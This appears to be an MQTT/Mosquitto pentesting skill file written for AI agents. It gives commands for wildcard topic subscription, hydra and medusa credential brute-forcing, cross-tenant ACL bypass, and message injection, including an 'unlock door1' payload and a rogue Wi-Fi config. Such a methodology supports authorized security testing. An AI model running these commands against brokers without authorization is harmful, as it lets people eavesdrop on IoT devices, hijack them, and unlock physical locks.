Hacktricks-skills mqtt-pentesting
Pentest MQTT (Mosquitto) services on port 1883 or non-standard ports. Use this skill whenever the user mentions MQTT, Mosquitto, IoT device testing, publish/subscribe protocols, or needs to enumerate and exploit MQTT brokers. This includes checking for authentication bypass, topic enumeration, ACL bypass, and plaintext credential exposure.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/network-services-pentesting/1883-pentesting-mqtt-mosquitto/SKILL.MDsource content
MQTT Pentesting Skill
A comprehensive guide for pentesting MQTT (Mosquitto) services, commonly found in IoT environments.
When to Use This Skill
Use this skill when:
- Port 1883 (or non-standard MQTT ports) is open on a target
- You need to enumerate MQTT topics and messages
- Testing IoT device communication protocols
- Checking for authentication bypass or weak ACLs
- Analyzing publish/subscribe message flows
- Looking for plaintext credential exposure
Quick Start
# Subscribe to all topics on a broker mosquitto_sub -h <host> -p <port> -t "#" -v # Subscribe to system topics mosquitto_sub -h <host> -p <port> -t "$SYS/#" -v # Publish a test message mosquitto_pub -h <host> -p <port> -t "test/topic" -m "Hello World"
Step 1: Service Discovery
Identify MQTT Services
MQTT typically runs on port 1883, but IoT devices often use non-standard ports:
# Nmap scan for MQTT nmap -p 1883 --script mqtt-discover <target> # Check for MQTT on common alternative ports nmap -p 1883,8001,8883,8080,9001 <target> # Shodan queries for reconnaissance # port:1883 MQTT # port:8001 MQTT
Verify MQTT Protocol
Use Wireshark to confirm MQTT traffic on suspicious ports:
- Look for CONNECT/CONNACK packets
- Check for SUBSCRIBE/PUBLISH frames
- Note: MQTT is often plaintext (no TLS)
Step 2: Connection Testing
Test Anonymous Access
Many MQTT brokers allow unauthenticated connections:
# Try connecting without credentials mosquitto_sub -h <host> -p <port> -t "#" -v # Check connection return codes # 0x00 = Connection accepted # 0x05 = Connection refused (not authorized)
Use the MQTT Scanner Script
Run the bundled scanner to automate connection testing:
python scripts/mqtt_scanner.py --host <target> --port <port>
This script will:
- Attempt anonymous connection
- Subscribe to all topics (
)# - Subscribe to system topics (
)$SYS/# - Display received messages in real-time
Step 3: Topic Enumeration
Subscribe to Common Topics
# All topics mosquitto_sub -h <host> -p <port> -t "#" -v # System topics (broker info) mosquitto_sub -h <host> -p <port> -t "$SYS/#" -v # Common IoT topic patterns mosquitto_sub -h <host> -p <port> -t "home/#" -v mosquitto_sub -h <host> -p <port> -t "device/#" -v mosquitto_sub -h <host> -p <port> -t "sensor/#" -v mosquitto_sub -h <host> -p <port> -t "control/#" -v
IoT-Specific Topic Patterns
Consumer IoT platforms often use predictable topic structures:
# Gateway/hub device topics mosquitto_sub -h <broker> -p <port> -t "/gateway/<deviceId>/#" -v # App control topics mosquitto_sub -h <broker> -p <port> -t "/app/<deviceId>/#" -v # Admin/maintenance topics (may leak credentials) mosquitto_sub -h <broker> -p <port> -t "/admin/#" -v mosquitto_sub -h <broker> -p <port> -t "/config/#" -v mosquitto_sub -h <broker> -p <port> -t "/sys/#" -v
Step 4: Authentication Testing
Brute-Force Credentials
If authentication is required, test common credentials:
# Using hydra for MQTT brute-force hydra -l <username> -P <wordlist> <target> mqtt # Using medusa medusa -h <target> -u <username> -P <wordlist> -M mqtt
Test with Known Credentials
mosquitto_sub -h <host> -p <port> -u <username> -P <password> -t "#" -v
Step 5: ACL Bypass Testing
Cross-Tenant Access
Test if you can access other tenants' devices:
# Publish to another device's topic mosquitto_pub -h <broker> -p <port> \ -u <username> -P <password> \ -t "/tenant/<victimDeviceId>/tx" \ -m '{"command":"power","value":"on"}' # Subscribe to another tenant's topics mosquitto_sub -h <broker> -p <port> \ -u <username> -P <password> \ -t "/tenant/<victimDeviceId>/#" -v
Common ACL Bypass Patterns
# Try publishing to admin topics mosquitto_pub -h <broker> -p <port> \ -t "/admin/config" \ -m '{"wifi_ssid":"evil","wifi_pass":"password"}' # Try device control commands mosquitto_pub -h <broker> -p <port> \ -t "/device/<id>/control" \ -m '{"method":"Device.setState","params":{"state":{"power":"on"}}}'
Step 6: Message Injection
Publish Test Messages
# Simple message mosquitto_pub -h <host> -p <port> -t "test/topic" -m "Hello World" # JSON payload mosquitto_pub -h <host> -p <port> -t "device/control" \ -m '{"action":"unlock","device":"door1"}' # With QoS level mosquitto_pub -h <host> -p <port> -t "topic" -m "message" -q 1
MQTT Packet Types Reference
| Type | Code | Description |
|---|---|---|
| CONNECT | 1 | Client requests connection |
| CONNACK | 2 | Server acknowledges connection |
| PUBLISH | 3 | Send message |
| PUBACK | 4 | Acknowledge PUBLISH |
| SUBSCRIBE | 8 | Request to listen to topic |
| SUBACK | 9 | Acknowledge SUBSCRIBE |
| UNSUBSCRIBE | 10 | Stop receiving topic |
| DISCONNECT | 14 | Terminate connection |
Common Vulnerabilities
1. Plaintext Credentials
- MQTT does not use encryption by default
- Credentials sent in clear text
- Use Wireshark to capture CONNECT packets
2. Missing Authentication
- Many brokers allow anonymous access
- Check return code 0x00 (accepted) vs 0x05 (refused)
3. Weak Topic ACLs
- Topics namespaced only by deviceId
- Any authenticated user can access all devices
- Test cross-tenant access
4. Sensitive Data Leakage
- Wi-Fi credentials in config topics
- Device state information
- User activity data
Tools
Mosquitto Clients
apt-get install mosquitto mosquitto-clients
Python MQTT Client
pip install paho-mqtt
Additional Tools
Reporting
Document findings with:
- Broker address and port
- Authentication status (open/required)
- Enumerated topics
- Sensitive data discovered
- ACL bypass capabilities
- Sample messages captured